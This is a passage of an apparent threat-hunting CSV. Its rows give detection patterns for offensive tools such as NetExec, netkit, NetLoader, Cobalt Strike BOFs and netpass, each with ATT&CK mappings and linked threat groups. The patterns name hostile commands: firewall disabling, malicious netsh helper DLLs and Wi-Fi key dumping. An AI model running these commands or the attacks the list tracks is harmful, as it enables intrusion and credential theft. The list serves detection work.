"*netero1010/SCCMVNC*",".{0,1000}netero1010\/SCCMVNC.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","53143" "*netero1010/ScheduleRunner*",".{0,1000}netero1010\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","53144" "*netero1010/ServiceMove-BOF*",".{0,1000}netero1010\/ServiceMove\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","53145" "*NetExec ldap * --*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53146" "*NetExec ldap * --dc-ip*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-dc\-ip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53147" "*NetExec ldap * -M enum_trusts*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-M\senum_trusts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of 
large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53148" "*netexec smb *",".{0,1000}netexec\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53149" "*NetExec winrm *--*",".{0,1000}NetExec\swinrm\s.{0,1000}\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53150" "*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53151" "*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - 
T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53152" "*Net-GPPPassword.cs*",".{0,1000}Net\-GPPPassword\.cs.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53153" "*Net-GPPPassword.exe*",".{0,1000}Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53154" "*Net-GPPPassword_dotNET*",".{0,1000}Net\-GPPPassword_dotNET.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53155" "*Net-GPPPassword-master*",".{0,1000}Net\-GPPPassword\-master.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53156" "*nethunter-*.torrent*",".{0,1000}nethunter\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53157" "*nethunter-*.zip*",".{0,1000}nethunter\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53158" "*nethunter-*-oos-ten-kalifs-full.zip*",".{0,1000}nethunter\-.{0,1000}\-oos\-ten\-kalifs\-full\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53159" "*NETKIT_LOG(""*",".{0,1000}NETKIT_LOG\(\"".{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53160" "*NETKIT_XOR\x00*",".{0,1000}NETKIT_XOR\\x00.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over 
network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53161" "*netlm_downgrade.*",".{0,1000}netlm_downgrade\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53162" "*NETLMv2_fmt_plug.*",".{0,1000}NETLMv2_fmt_plug\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53163" "*NetLoader.exe --path 
*.exe *",".{0,1000}NetLoader\.exe\s\-\-path\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","53164" "*NetLoader-master*",".{0,1000}NetLoader\-master.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","53165" "*netloggedonusers.*",".{0,1000}netloggedonusers\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","53166" "*netlogon_##*",".{0,1000}netlogon_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 
BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","53167" "*netntlm.pl *",".{0,1000}netntlm\.pl\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53168" "*NetNTLMtoSilverTicket.git*",".{0,1000}NetNTLMtoSilverTicket\.git.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53169" "*NetNTLMtoSilverTicket-master*",".{0,1000}NetNTLMtoSilverTicket\-master.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential 
Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53170" "*netpass.exe*",".{0,1000}netpass\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53171" "*netpass.zip*",".{0,1000}netpass\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53172" "*netpass_x64.exe*",".{0,1000}netpass_x64\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. 
It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53173" "*netpass-x64.zip*",".{0,1000}netpass\-x64\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53174" "*NetRipper DLL (32 bits) successfully compiled*",".{0,1000}NetRipper\sDLL\s\(32\sbits\)\ssuccessfully\scompiled.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53176" "*NetRipper DLL (64 bits) successfully compiled*",".{0,1000}NetRipper\sDLL\s\(64\sbits\)\ssuccessfully\scompiled.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53177" 
"*netsh add helper netshBad.DLL*",".{0,1000}netsh\sadd\shelper\snetshBad\.DLL.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","53184" "*netsh advfirewall firewall add rule *Deny Outbound for *",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\s.{0,1000}Deny\sOutbound\sfor\s.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#firewallrulename","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","53185" "*netsh firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","53195" "*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*",".{0,1000}netsh\swlan\sshow\sprofile\s\$wlan\skey\=clear\s\|\sSelect\-String\s.{0,1000}\?\<\=Key\sContent\\s\+\:\\s.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53206" "*netsh* firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","offensive_tool_keyword","netsh","used by responder - LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","53208" "*netsh.exe interface ip delete arpcache >C:\Windows\TEMP\ipconfig.out 2>&1*",".{0,1000}netsh\.exe\sinterface\sip\sdelete\sarpcache\s\>C\:\\Windows\\TEMP\\ipconfig\.out\s2\>\&1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","53212" "*NetshHelperBeacon.exe*",".{0,1000}NetshHelperBeacon\.exe.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","53216" "*netsniff-ng*",".{0,1000}netsniff\-ng.{0,1000}","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. 
so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53218" "*NetSPI/Powershell-Modules*",".{0,1000}NetSPI\/Powershell\-Modules.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","53219" "*netstat -tnlp || ss -tnlp*",".{0,1000}netstat\s\-tnlp\s\|\|\sss\s\-tnlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","53222" "*netstat -unlp || ss -unlp*",".{0,1000}netstat\s\-unlp\s\|\|\sss\s\-unlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","53223" "*nettitude/ETWHash*",".{0,1000}nettitude\/ETWHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential 
Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","53236" "*nettitude/MalSCCM*",".{0,1000}nettitude\/MalSCCM.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","53237" "*netuser_enum*",".{0,1000}netuser_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
